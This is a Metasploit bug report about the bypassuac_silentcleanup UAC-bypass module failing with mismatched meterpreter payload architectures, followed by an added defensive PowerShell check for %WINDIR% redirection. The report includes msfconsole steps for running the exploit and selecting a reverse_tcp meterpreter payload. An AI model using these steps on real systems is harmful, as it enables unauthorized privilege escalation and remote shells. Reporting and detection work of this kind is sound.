
bypassuac_silentcleanup: meterpreter payloads don't work when the selected architecture isn't correct #12665

Closed
cnotin opened this issue Dec 5, 2019 · 0 comments

Comments

@cnotin (Contributor)

cnotin commented Dec 5, 2019

Steps to reproduce

  1. Obtain an x64 meterpreter session on an x64 Windows 10 host under an admin user but in a non-elevated context (because we want to bypass UAC)
  2. Use bypassuac_silentcleanup module with commands:
use exploits/windows/local/bypassuac_silentcleanup
set session 1
run

As we didn't select a payload, windows/meterpreter/reverse_tcp (-> x86) will be selected by default

Expected behavior

We get an elevated session. It should work even if the architecture is incorrect because the generated PowerShell begins with an architecture detection gadget:

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};

See https://github.com/rapid7/rex-powershell/blob/3e79abf73709c9be2e6796da29927aaa171e1405/lib/rex/powershell/command.rb#L238-L244

Current behavior

We don't get any elevated session because this UAC exploit messes with the %WINDIR% env variable (that's its goal!), so the architecture detection gadget fails to launch a new powershell.exe with the correct architecture for the payload, as it uses %WINDIR% in its path:

$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'

Alternative solution: choosing the correct payload:

set payload windows/x64/meterpreter/reverse_tcp

System stuff

Metasploit version

Framework: 5.0.62-dev
Console : 5.0.62-dev

I installed Metasploit with:

Kali package

OS

Kali
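The failure described above comes down to one thing: the gadget builds its path to the 32-bit PowerShell from `$env:windir`, and this module deliberately redirects that variable. The following check is an added example written from a defender's point of view; it is not code from the issue, from Metasploit or from rex-powershell. It compares the process's `%WINDIR%` with the Windows directory reported by the OS and tests whether the exact path the gadget would build still resolves, which is a cheap way to notice that the environment of a host has been tampered with in this way. The function name `Test-WindirRedirect` and its output fields are my own.

```powershell
# Added example, not from the issue or the Metasploit project.
# Reports whether %WINDIR% in this process has been redirected away from the
# real Windows directory, and whether the syswow64 PowerShell path that the
# rex-powershell architecture gadget builds from it still exists.
function Test-WindirRedirect {
    # Windows directory as the OS itself reports it, independent of the environment block
    $expected = [Environment]::GetFolderPath('Windows')
    # Windows directory as the (possibly hijacked) environment variable claims it is
    $current  = $env:windir

    # Same path the gadget quoted in the issue would try to launch
    $gadgetPath = Join-Path $current 'syswow64\WindowsPowerShell\v1.0\powershell.exe'

    $redirected = -not [string]::Equals($expected.TrimEnd('\'), $current.TrimEnd('\'),
                                        [System.StringComparison]::OrdinalIgnoreCase)

    [pscustomobject]@{
        ExpectedWindir    = $expected
        CurrentWindir     = $current
        Redirected        = $redirected
        GadgetPath        = $gadgetPath
        GadgetPathExists  = Test-Path -LiteralPath $gadgetPath -PathType Leaf
        Is32BitProcess    = ([IntPtr]::Size -eq 4)
    }
}

# Usage: run in the session under suspicion; Redirected = $true together with
# GadgetPathExists = $false is exactly the state in which the module's payload fails.
Test-WindirRedirect | Format-List
```

On an untouched host `ExpectedWindir` and `CurrentWindir` agree and the syswow64 path exists (on a 64-bit install), so every field reads as expected; a mismatch is worth following up on regardless of whether any payload ran, since a per-process `%WINDIR%` that no longer points at the real Windows directory is not something legitimate software does.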
